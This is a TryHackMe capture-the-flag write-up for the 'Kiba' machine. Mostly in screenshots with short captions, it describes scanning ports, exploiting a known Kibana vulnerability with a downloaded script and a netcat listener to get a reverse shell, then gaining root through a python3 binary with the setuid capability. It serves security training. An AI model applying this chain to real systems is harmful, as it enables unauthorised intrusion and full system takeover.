# Kiba ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdmy51wIfnhDJU4Q3iF%2Fimage.png?alt=media\&token=f511e4bf-ad83-4221-966d-191c5325ee42) Lets search on google for the answer to the first question ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdmyxvy-DD6Jrf_EnLf%2Fimage.png?alt=media\&token=04ddd7df-d9ac-4228-a3e0-6d1f7dfece9c) ## Scanning Lets run network scans to find open ports and services ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn-SD5RFwi0F92mbb_%2Fimage.png?alt=media\&token=679ed526-5d2d-4a41-ba63-f249da762045) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn-MY1JpljiONOAPMk%2Fimage.png?alt=media\&token=226728c9-1e38-4d30-8d81-a6f74f461033) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn-q0d79_7RxDdk8HV%2Fimage.png?alt=media\&token=e367af37-138a-4b35-b8d6-55abd7494754) ## Enumeration Lets check the webpage running on port 80 ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-MdmzYeGBBa5HggLoE_V%2Fimage.png?alt=media\&token=1ce4b8c1-b317-4553-bce7-6fa5208dc572) There is nothing. Lets check Port 5044 ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn01KWMnZXh8LOpBnI%2Fimage.png?alt=media\&token=53f09e0f-f182-4af0-bb7b-25772d00842a) Nothing. Lets check Port 5601 ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn0BLkpFgRh9_F1zU0%2Fimage.png?alt=media\&token=7e1429aa-a39e-457b-8f0d-97f66739f5a8) We have a Kibana app running, lets check the `version` in the Management tab ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn0NYWMcPKT6jqA38C%2Fimage.png?alt=media\&token=d669fd8d-5eab-41ce-b10f-0c80964fa821) Lets look for a vulnerability on this version on Google. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn0pER9IMh2P_zauIg%2Fimage.png?alt=media\&token=fac3637a-ecf8-4579-80fd-236e7ce5a079) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn2crl-G2G_CpwTqmB%2Fimage.png?alt=media\&token=41932c4a-e3f1-4dbf-affd-f58c835b9a1a) ## Exploitation Looks like we found it. Lets download the exploit script. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn15CgZF-nWBYAUN0X%2Fimage.png?alt=media\&token=69ffcaf0-e213-41ca-bed4-8bb27000c880) Lets look at the exploit ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn1a82WdPPn51NWdoC%2Fimage.png?alt=media\&token=c605c285-675f-4ab0-a1bd-6752d06ac166) Looks like we have options to set, lets first start a netcat listener. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn1hoVfO9LASoV7QBj%2Fimage.png?alt=media\&token=7c17ecf5-e598-480c-a6aa-8e5d4bfe2ff5) Now lets run the exploit with the right options ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn2I6h2gDv9ElAhzs1%2Fimage.png?alt=media\&token=f88af9ac-09b9-4450-a6f6-c5d5f79cb07f) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn2Kbug-KJMkXf7trF%2Fimage.png?alt=media\&token=f1a80850-c367-45d8-8b16-cd8311d2199c) We have a shell, lets read the user flag. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn2UgMUjf5RCp46SRA%2Fimage.png?alt=media\&token=64f5e752-9bcf-45d4-9b63-58048d844d1d) ## Privilege Escalation The next tryhackme question is talking about capabilities so lets go check how we can see capabilities in Linux. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn41zydhbE6-9b1rgB%2Fimage.png?alt=media\&token=94fedc42-310a-4d95-b3ce-73a70f86649e) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn6FA0I0BiNr-_S3Fa%2Fimage.png?alt=media\&token=a12c63ec-ef81-4880-8fa0-d3b3f58974e2) We can see what this capability is [here](https://man7.org/linux/man-pages/man7/capabilities.7.html). ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn50DSMhyBivq1P4TV%2Fimage.png?alt=media\&token=b8f9f684-c8d9-40b1-b53b-9d8e594a9ad9) Looks like we can change the `UID` with the `python3` file in the `kiba` directory, lets check it out. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn5a-YrXJkIpwae1Jn%2Fimage.png?alt=media\&token=0cf92f02-5a16-4905-af7b-454151e7c154) Lets run the file and make it change our UID to 0 which is the UID for root. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn5suoNQ9PME62rYH5%2Fimage.png?alt=media\&token=4ba25b94-7075-47a9-bb4e-23b00dbc8459) We are now root, lets read the root flag ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn60J8lXG13ReNoJXN%2Fimage.png?alt=media\&token=2530ea6b-3c6c-44c1-83da-3fb733b25cb5)